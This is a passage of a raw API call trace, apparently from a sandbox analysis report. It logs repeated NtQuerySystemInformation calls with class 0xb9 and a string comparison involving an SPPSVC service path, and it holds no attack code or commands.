SystemInformation=0xa781ffd960, Length=0x28, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x28, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x28, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9d0, Length=0x28, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda50, Length=0x28, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda50, Length=0x28, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x20, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x20, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x20, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb30, Length=0x38, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x20, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x20, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd40, Length=0x28, ResultLength=0x0) [0233.293] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb20, Length=0x28, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb20, Length=0x28, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb20, Length=0x28, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x28, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x28, ResultLength=0x0) [0233.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x28, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x20, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x20, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x20, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd40, Length=0x28, ResultLength=0x0) [0233.363] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddc0, Length=0x50, ResultLength=0x0) [0233.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb20, Length=0x28, ResultLength=0x0) [0233.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb20, Length=0x28, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb20, Length=0x28, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x28, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x28, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x28, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x20, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x20, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x20, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x38, ResultLength=0x0) [0233.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x50, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x50, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8f0, Length=0x50, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0233.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6c0, Length=0x28, ResultLength=0x0) [0233.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd740, Length=0x28, ResultLength=0x0) [0233.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd740, Length=0x28, ResultLength=0x0) [0233.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5e0, Length=0x20, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd560, Length=0x20, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd560, Length=0x20, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd560, Length=0x20, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd820, Length=0x38, ResultLength=0x0) [0233.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6a0, Length=0x20, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd630, Length=0x20, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd630, Length=0x20, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x50, ResultLength=0x0) [0233.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x50, ResultLength=0x0) [0233.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.395] NtQuerySystemInformation (SystemInformationClass=0xb9, 